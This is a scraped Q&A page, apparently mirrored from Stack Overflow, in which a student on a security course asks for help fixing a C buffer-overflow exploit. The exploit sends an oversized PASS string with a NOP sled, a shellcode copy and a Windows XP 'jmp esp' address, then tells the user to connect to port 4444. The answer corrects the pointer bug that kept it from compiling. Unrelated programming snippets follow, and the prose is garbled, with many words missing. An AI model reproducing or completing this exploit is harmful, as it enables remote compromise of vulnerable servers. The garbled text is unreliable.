buffer overflow - Assignment from Incompatible Pointer Type In C Script -

-

in course i'm taking, given broken buffer overflow script written in c, , have fix broken coding. i've patched few things far, receiving error message when trying compile (the error showed initial code, not edited):

 

646-fixed.c: in function ‘exploit’:

646-fixed.c:48: warning: assignment incompatible pointer type

 

below function error occurring. i'm not familiar c - responses received yesterday, understand happening due ptr's type being int, & evil's type being char. don't understand can fix - can this? can see full script here  

void exploit(int sock) {       file *test;       int *ptr;       char userbuf[] = "user madivan\r\n";       char evil[3001];       char buf[3012];       char receive[1024];       char nopsled[] = "\x90\x90\x90\x90\x90\x90\x90\x90"                        "\x90\x90\x90\x90\x90\x90\x90\x90";       memset(buf, 0x00, 3012);       memset(evil, 0x00, 3001);       memset(evil, 0x43, 3000); 48    ptr = &evil;       ptr = ptr + 652; // 2608        memcpy(ptr, &nopsled, 16);       ptr = ptr + 4;       memcpy(ptr, &shellcode, 317);       *(long*)&evil[2600] = 0x7cb41010; // jmp esp xp 7cb41020 ffe4 jmp esp        // banner       recv(sock, receive, 200, 0);       printf("[+] %s", receive);       // user       printf("[+] sending username...\n");       send(sock, userbuf, strlen(userbuf), 0);       recv(sock, receive, 200, 0);       printf("[+] %s", receive);       // passwd       printf("[+] sending evil buffer...\n");       sprintf(buf, "pass %s\r\n", evil);       //test = fopen("test.txt", "w");       //fprintf(test, "%s", buf);       //fclose(test);       send(sock, buf, strlen(buf), 0);       printf("[*] done! connect host on port 4444...\n\n"); }

note: posted yesterday providing few lines of code, , result, couldn't clear answer - deleted , reposting it.

the type of &evil pointer length 3001 array or char, or char (*)[3001]. type of ptr pointer int, or int*. types incompatible. can't assign 1 other.

what need pointer first element of evil. can use pointer char, i.e. char*, , assign evil it:

char *ptr; .... ptr = evil;

here, evil decays pointer first element array, assignment works. equivalent assigning address of first element:

ptr = &evil[0];

Comments

Post a Comment

Popular posts from this blog

python - How to create jsonb index using GIN on SQLAlchemy? -

-
here's current code creating index jsonb. index("mytable_data_idx_id_key", mytable.data['id'].astext, postgresql_using='gin') but got error. sqlalchemy.exc.programmingerror: (psycopg2.programmingerror) data type text has no default operator class access method "gin" hint: must specify operator class index or define default operator class data type. [sql: "create index event_data_idx_id_key on event using gin ((data ->> 'id'))"] is there way create index on sqlalchemy? the postgresql specific sqlalchemy docs @ http://docs.sqlalchemy.org/en/latest/dialects/postgresql.html#operator-classes mention postgresql_ops dictionary provide "operator class" used postgresql, , provide example illustrating use: index('my_index', my_table.c.id, my_table.c.data, postgresql_ops={ 'data': 'text_pattern_ops', ...
Read more

PHP DOM loadHTML() method unusual warning -

-
i had following code works fine on localhost: $document = new domdocument(); $document->loadhtml($p_result); $form = $document->getelementsbytagname('form')->item(0); // code continues using $form variable after same code updated on outside server, loadhtml() failed , issued warning. warning: domdocument::loadhtml() expects parameter 1 valid path, string given in path/name/to/script.php returned null instead of object code pretty gets fatal error. note contents of $p_result absolutely same on outside server , on localhost. but why displays kind of warning , why not work? doesn't loadhtml() expects argument 1 string in first place? why method expects parameter 1 valid path ? just make clear i'm not calling loadhtmlfile() , i'm calling loadhtml() . thanks. you're affected one of php bugs . issue present in php 5.6.8 , 5.6.9. have affected php version on server, , bug-free version on localhost. the bug forbids null ...
Read more

c# - TransactionScope not rolling back although no complete() is called -

-
i'm using transactionscope rollback transaction fail bool errorreported = false; action<importerrorlog> newerrorcallback = e => { errorreported = true; errorcallback(e); }; using (var transaction = new transactionscope()) { foreach (importtaskdefinition task in taskdefinition) { loader.load(streamfile, newerrorcallback, task.destinationtable, processingtaskid); } if (!errorreported) transaction.complete(); } i'm sure there no transactionscope started ahead or after code. i'm using entity framework insert in db. regardless state of errorreported transaction never rolled in case of error. what missing ? transactionscope sets transaction.current . that's does. wants transacted must @ property. i believe ef each time connection opened reason. probably, connection open when scope installed. open connection inside of scope or enlist manually. ef has nasty "design decision": default opens ...
Read more